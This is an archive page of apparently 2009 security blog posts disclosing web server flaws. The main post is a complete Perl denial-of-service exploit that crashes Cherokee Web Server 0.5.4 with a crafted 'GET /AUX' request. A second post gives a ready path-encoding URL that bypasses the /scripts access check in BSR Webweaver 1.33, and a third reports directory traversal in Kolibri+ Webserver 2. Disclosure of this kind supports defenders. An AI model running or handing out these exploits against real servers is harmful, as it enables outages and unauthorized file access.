Archive for the ‘Exploit’ Tag
Cherokee Web Server 0.5.4 Denial Of Service
Filed under: Hacking & Security | Tags: Cherokee Web Server, Denial Of Service, Exploit, perl exploit code, usman saeed, version 0.5.4, vulnerbility
Leave a Comment #######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################
Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
[*] Download Page : http://www.cherokee-project.com/download/windows/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes !
[*] Exploitation :
#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]
$host = $ARGV[0];
$PORT = $ARGV[1];
$packet = “AUX”;
$stuff = “GET /”.$packet.” HTTP/1.1\r\n” .
“User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n” .
“Host:127.0.0.1\r\n”.
“Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n”.
“Accept-Language: en-US,en;q=0.9\r\n”.
“Accept-Charset: iso-8859-1,*,utf-8\r\n”.
“Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n”;
use IO::Socket::INET;
if (! defined $ARGV[0])
{
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;
exit;
}
$sock = IO::Socket::INET->new( Proto => “tcp”,PeerAddr => $host , PeerPort => $PORT) || die “Cant connect to $host!”;
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;
print “\n”;
print “[*] Initializing\n”;
sleep(2);
print “[*] Sendin DOS Packet \n”;
send ($sock , $stuff , 0);
print “[*] Crashed 
\n”;
$res = recv($sock,$response,1024,0);
print $response;
exit;
BSR Webweaver 1.33 /script security Bypass vulnerability
Filed under: Hacking & Security | Tags: BSR-webweaver, bypass, Exploit, scripts, version 1.33
Leave a Comment BSR Webweaver 1.33
Author : Usman Saeed , Exploit @ Xc0re Security Research Group.
[*] Date: 15/09/09
[*] http://www.brswebweaver.com/downloads.html
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.
This is the reason this exploit is not called a Directory Listing Exploit !
[*] Exploitation :
[+] http://[host]/scripts/%bg%ae%bg%ae/.exe
Kolibri+ Webserver 2 Multiple Vulnerabilities
Filed under: Hacking & Security | Tags: Directory Traversal, DOS, Exploit, GET, Http Server, Kolibri+ Webserver 2, Port
Comments (1) 
Kolibri+ Webserver 2 suffers from multiple vulnerabilities namely Directory Traversal & Denial OF Service. Vulnerability was reported on 6th of September 2009 by Xc0re Security Research Group.
http://xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities
An attacker can easily crash the server , or send a crafted http request to escape the root directory and view any file , even outside the root directory.
